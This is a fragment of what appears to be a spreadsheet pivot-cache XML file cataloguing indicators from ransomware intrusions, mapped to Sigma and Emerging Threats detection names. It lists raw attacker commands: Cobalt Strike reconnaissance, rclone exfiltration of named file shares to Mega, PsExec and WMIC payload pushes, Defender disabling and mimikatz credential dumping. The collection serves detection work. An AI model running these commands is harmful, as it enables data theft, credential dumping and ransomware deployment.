    <s v="shell netscan.exe /hide /auto:&quot;resuult.xml&quot; /config:netscan.xml /file:range.txt"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="121"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="beacon&gt; shell net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="122"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="beacon&gt; shell net user ebernardo /domain"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="123"/>
    <x v="28"/>
    <s v="cmdline"/>
    <s v="execute-assembly /home/user/soft/scripts/SharpView.exe Find- DomainUserLocation -UserIdentity gpetit"/>
    <s v="linux"/>
    <x v="1"/>
  </r>
  <r>
    <x v="124"/>
    <x v="28"/>
    <s v="cmdline"/>
    <s v="execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="125"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="shell net view \\172.16.1.40 /ALL"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="126"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="shell dir \\172.16.1.40\c$"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="127"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla_x000a_\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="128"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="shell rclone.exe copy &quot;шара&quot; Mega:training -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="129"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="shell rclone.exe copy &quot;\\WTFINANCE.washoetribe.net\E$\FINANCE&quot; mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="130"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="shell rclone.exe copy &quot;\\trucamtldc01\E$\Data&quot; remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="131"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="shell rclone.exe copy &quot;\\FS\&quot; remote:NT -q --ignore-existing --auto-confirm --multi-thread- streams 12 --transfers 12"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="132"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="shell rclone.exe copy &quot;\\PETERLENOVO.wist.local\Users&quot; ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="133"/>
    <x v="0"/>
    <s v="url"/>
    <s v="https://mega.io/sync "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="134"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="cyber_x000a_policy_x000a_insurance_x000a_endorsement_x000a_supplementary_x000a_underwriting_x000a_terms_x000a_bank_x000a_2020_x000a_2021_x000a_Statement"/>
    <s v="conti keyword search"/>
    <x v="1"/>
  </r>
  <r>
    <x v="135"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY &quot;\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe&quot; &quot;C:\windows\temp\&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="136"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="137"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="start wmic /node:@C:\share$\comps1.txt /user:&quot;DOMAIN\Administrator&quot; /password:&quot;PASSWORD&quot; process call create &quot;cmd.exe /c bitsadmin /transfer fx166\\DOMAIN CONTROLLER share$\fx166.exe %APPDATA%\fx166.exe&amp;%APPDATA%\fx166.exe&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="138"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="gpedit.msc Select &quot;Disable real-time protection&quot; and change it to &quot;Enabled&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="139"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="140"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="New-ItemProperty -Path &quot;HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender&quot; -Name_x000a_DisableAntiSpyware -Value 1 -PropertyType DWORD - Force"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="141"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="142"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="token::elevate"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="143"/>
    <x v="12"/>
    <s v="cmdline"/>
    <s v="lsadump::sam"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="144"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Use of Cobalt Strike EXECUTE-ASSEMBLY to execute .net in memory "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="145"/>
    <x v="2"/>
    <s v="cmdline"/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fAllowToGetHelp /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="146"/>
    <x v="29"/>
    <s v="cmdline"/>
    <s v="ipconfig /all"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="147"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="systeminfo"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="148"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="149"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net config workstation"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="150"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="151"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="152"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="153"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="154"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="155"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C nltest /dclist:"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="156"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C net group /domain &quot;Domain Computers&quot;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="157"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="cmd.exe /C net group /domain &quot;Enterprise Admins&quot;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="158"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="159"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="160"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="161"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="162"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="163"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="164"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="165"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="166"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd /c ping \\redacted\"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="167"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="conhost.exe 0xffffffff - ForceV1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="168"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; listback.txt"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="169"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; list1.txt"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="170"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;service_install&quot;, &quot;file_name&quot;: \\host\ADMIN$\044b7e1.exe&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="171"/>
    <x v="0"/>
    <s v="named_pipe"/>
    <s v="pipeName: \MSSE-3328-server and Image: 61582ab.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="172"/>
    <x v="0"/>
    <s v="named_pipe"/>
    <s v="pipeName: \MSSE-7344-server and Image: 044b7e1.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="173"/>
    <x v="30"/>
    <s v="cmdline"/>
    <s v="regsvr32.exe /s /n /i:&quot;-m -net -size 10 -nomutex -p \\host\C$&quot; x64.dll"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="174"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response_x000a_ET MALWARE Cobalt Strike Beacon Activity (GET)_x000a_ETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI_x000a_ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement_x000a_ET POLICY SMB Executable File Transfer_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File_x000a_ET HUNTING Possible Powershell .ps1 Script Use Over SMB_x000a_ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="175"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Atera Agent"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="176"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Splashtop"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="177"/>
    <x v="0"/>
    <s v="c2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="178"/>
    <x v="0"/>
    <s v="file_name"/>
    <s v="AteraAgent.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="179"/>
    <x v="0"/>
    <s v="file_name"/>
    <s v="SplashtopStreamer3360.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="180"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="dllhost.exe accessed lsass memory"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="181"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32.exe \\host\c$\ProgramData\c64.dll, StartA"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="182"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\msiexec.exe /I C:\programdata\sql.msi"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="183"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="184"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="cmd /c dir &quot;\\host\c$&quot; /s&gt;&gt; listback.txt"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="185"/>
    <x v="30"/>
    <s v="cmdline"/>
    <s v="regsvr32.exe /s c:\users\&lt;uname&gt;\AppData\Local\Temp\Ewge.dll"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="186"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;uname&gt;\AppData\LocalTemp\Faicury4.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="187"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;msiexec.exe /V&quot;, &quot;process_command_line&quot;: r''' &quot;AleterAgent.exe&quot; /i /IntegratorLogin=&quot;&quot; /CompanyId=&quot;&quot; /IntegratorLoginUI=&quot;&quot; /CompanyIdUI=&quot;&quot; '''}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="188"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;msiexec.exe /V&quot;, &quot;process_command_line&quot;: r''' &quot;AleterAgent.exe&quot; /i /IntegratorLogin=&quot;&quot; /CompanyId=&quot;&quot; /IntegratorLoginUI=&quot;&quot; /CompanyIdUI=&quot;&quot; /FolderId=&quot;&quot; /AccountId=&quot;&quot; '''}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="189"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;msiexec.exe /V&quot;, &quot;process_command_line&quot;: r''' &quot;AleterAgent.exe&quot; /u '''}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="190"/>
    <x v="3"/>
    <s v="object"/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="191"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;open_process_api_call&quot;, &quot;process_command_line&quot;: &quot;lsass.exe&quot;, &quot;initiating_process_command_line&quot;: r''' &quot;taskmgr.exe&quot; /4 ''', &quot;desired_access&quot;: &quot;5136&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="192"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;open_process_api_call&quot;, &quot;process_command_line&quot;: &quot;lsass.exe&quot;, &quot;initiating_process_command_line&quot;: r''' rundll32.exe \\host\c$\ProgramData\c64.dll, StartA''', &quot;desired_access&quot;: &quot;64&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="193"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;open_process_api_call&quot;, &quot;process_command_line&quot;: &quot;lsass.exe&quot;, &quot;initiating_process_command_line&quot;: r''' dllhost.exe''', &quot;desired_access&quot;: &quot;4112&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="194"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;open_process_api_call&quot;, &quot;process_command_line&quot;: &quot;lsass.exe&quot;, &quot;initiating_process_command_line&quot;: r''' taskmgr''', &quot;desired_access&quot;: &quot;5136&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="195"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;open_process_api_call&quot;, &quot;process_command_line&quot;: &quot;lsass.exe&quot;, &quot;initiating_process_command_line&quot;: r''' regsvr32.exe /s &quot;c:\Users\uname\AppData\Local\Temp\Edebef4.dll''', &quot;desired_access&quot;: &quot;64&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="196"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Desired Access = 5136 Hex Value 1410 PROCESS_VM_READ (0x0010) PROCESS_QUERY_INFORMATION (0x0400) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)*"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="197"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Desired Access = 4112 Hex Value 1010 PROCESS_VM_READ (0x0010) PROCESS_QUERY_LIMITED_INFORMATION (0x1000)"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="198"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Desired Access = 64 Hex Value 40 PROCESS_DUP_HANDLE (0x0040)"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="199"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;cmd.exe /c backup.bat&quot;, &quot;process_command_line&quot;: &quot;conhost.exe 0xffffffff -ForceV1&quot;}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="200"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="LSASS Memory Dump : 5ef9853e-4d0e-4a70-846f-a9ca37d876da"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="201"/>
    <x v="16"/>
    <s v="sigma"/>
    <s v="Malicious PowerView PowerShell Commandlets : dcd74b95-3f36-4ed9-9598-0490951643aa"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="202"/>
    <x v="20"/>
    <s v="sigma"/>
    <s v="AdFind Usage Detection : 9a132afa-654e-11eb-ae93-0242ac130002"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="203"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="Powershell Defender Disable Scan Feature : 1ec65a5f-9473-4f12-97da-622044d6df21"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="204"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Access to ADMIN$ Share : 098d7118-55bc-4912-a836-dc6483a8d150"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="205"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Atera Agent Installation : 87261fb2-69d0-42fe-b9de-88c6b5f65a43"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="206"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="CobaltStrike Service Installations : d7a95147-145f-4678-b85d-d1ff4a3bb3f6"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="207"/>
    <x v="0"/>
    <s v="c2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="208"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <s v="beacon"/>
    <x v="3"/>
  </r>
  <r>
    <x v="209"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}"/>
    <s v="beacon"/>
    <x v="3"/>
  </r>
  <r>
    <x v="210"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"/>
    <s v="beacon"/>
    <x v="3"/>
  </r>
  <r>
    <x v="211"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\7A86.dll,DllRegisterServer"/>
    <s v="beacon"/>
    <x v="3"/>
  </r>
  <r>
    <x v="212"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"/>
    <s v="beacon"/>
    <x v="3"/>
  </r>
  <r>
    <x v="213"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="214"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="215"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /dom"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="216"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\net1 group &quot;domain admins&quot; /dom"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="217"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="218"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C ping DOMAINCONTROLLER"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="219"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C ping ENDPOINT"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="220"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C net localgroup Administrators"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="221"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\System32\Taskmgr.exe"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="222"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="223"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="{&quot;object&quot;: &quot;net&quot;, &quot;initiating_process_command_line&quot;: &quot;svchost.exe -k UnistackSvcGroup -s WpnUserService&quot;, &quot;remote_port&quot;: &quot;445&quot;}"/>
    <s v="svchost injected with beacon scan smb"/>
    <x v="3"/>
  </r>
  <r>
    <x v="224"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -exec bypass -EncodedCommand "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="225"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:33242/'); Get-WmiObject -Class win32_logicalDisk -ComputerName SYSTEMNAME | Select-Object pscomputername, Name, @{n=&quot;Space&quot;;e={[math]::Round($_.Size/1GB,2)}}, @{n=&quot;FreeSpace&quot;;e={[math]::Round($_.FreeSpace/1GB,2)}}, @{n=&quot;BUSY&quot;;e={[math]::Round(($_.Size-$_.FreeSpace)/1GB,2)}}"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="226"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="powershell.exe -executionpolicy remotesigned -File .\Get-DataInfo.ps1 method"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="227"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="228"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;DOMAINCONTROLLER&quot; process call create &quot;C:\3.exe&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="229"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Users\REDACTED\AppData\Local\Temp\1\is-HCFKT.tmp\WinSCP-5.19.1-Setup.tmp&quot; /SL5=&quot;$A02B0,10288106,864256,C:\Users\USER\Desktop\WinSCP-5.19.1-Setup.exe&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="230"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;ENDPOINT&quot; process call create &quot;C:\test.exe&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="231"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)_x000a_ET MALWARE Observed Malicious SSL Cert (Bazar CnC)_x000a_ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2_x000a_ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response_x000a_ET POLICY TLS possible TOR SSL traffic_x000a_ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 234_x000a_ET HUNTING Possible Powershell .ps1 Script Use Over SMB_x000a_ET POLICY Possible WMI .mof Managed Object File Use Over SMB_x000a_ET POLICY SMB2 NT Create AndX Request For a .bat File_x000a_ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File_x000a_ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File_x000a_ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="232"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="CobaltStrike Service Installations : 5a105d34-05fc-401e-8553-272b45c1522d"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="233"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious Remote Thread Created : 66d31e5f-52d6-40a4-9615-002d3789a119"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="234"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Quick Execution of a Series of Suspicious Commands : 61ab5496-748e-4818-a92f-de78e20fe7f1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="235"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Pass the Hash Activity 2 : 8eef149c-bd26-49f2-9e5a-9b00e3af499b"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="236"/>
    <x v="15"/>
    <m/>
    <s v="Suspicious WMI Execution : 526be59f-a573-4eea-b5f7-f0973207634d"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="237"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Encoded IEX : 88f680b8-070e-402c-ae11-d2914f2257f1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="238"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Successful Overpass the Hash Attempt : 192a0330-c20b-4356-90b6-7b7049ae0b87"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="239"/>
    <x v="17"/>
    <s v="sigma"/>
    <s v="Domain Trust Discovery : 3bad990e-4848-4a78-9530-b427d854aac0"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="240"/>
    <x v="1"/>
    <s v="sigma"/>
    <s v="Suspicious Reconnaissance Activity : d95de845-b83c-4a9a-8a6a-4fc802ebf6c0"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="241"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="242"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="243"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="seatbelt"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="244"/>
    <x v="0"/>
    <s v="c2"/>
    <s v="Cobalt Strike "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="245"/>
    <x v="19"/>
    <s v="htool"/>
    <s v="Rclone"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="246"/>
    <x v="19"/>
    <s v="htool"/>
    <s v="Mega"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="247"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,#1"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="248"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
